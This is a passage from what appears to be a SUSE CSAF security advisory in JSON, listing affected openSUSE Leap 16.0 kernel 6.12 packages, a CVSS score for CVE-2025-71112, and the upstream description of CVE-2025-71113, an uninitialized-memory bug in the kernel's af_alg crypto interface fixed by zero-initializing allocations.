"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71113",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71113"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: af_alg - zero initialize memory allocated via sock_kmalloc\n\nSeveral crypto user API contexts and requests allocated with\nsock_kmalloc() were left uninitialized, relying on callers to\nset fields explicitly. This resulted in the use of uninitialized\ndata in certain error paths or when new fields are added in the\nfuture.\n\nThe ACVP patches also contain two user-space interface files:\nalgif_kpp.c and algif_akcipher.c. These too rely on proper\ninitialization of their context structures.\n\nA particular issue has been observed with the newly added\n\u0027inflight\u0027 variable introduced in af_alg_ctx by commit:\n\n 67b164a871af (\"crypto: af_alg - Disallow multiple in-flight AIO requests\")\n\nBecause the context is not memset to zero after allocation,\nthe inflight variable has contained garbage values. As a result,\naf_alg_alloc_areq() has incorrectly returned -EBUSY randomly when\nthe garbage value was interpreted as true:\n\n https://github.com/gregkh/linux/blame/master/crypto/af_alg.c#L1209\n\nThe check directly tests ctx-\u003einflight without explicitly\ncomparing against true/false. Since inflight is only ever set to\ntrue or false later, an uninitialized value has triggered\n-EBUSY failures. Zero-initializing memory allocated with\nsock_kmalloc() ensures inflight and other fields start in a known\nstate, removing random issues caused by uninitialized data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
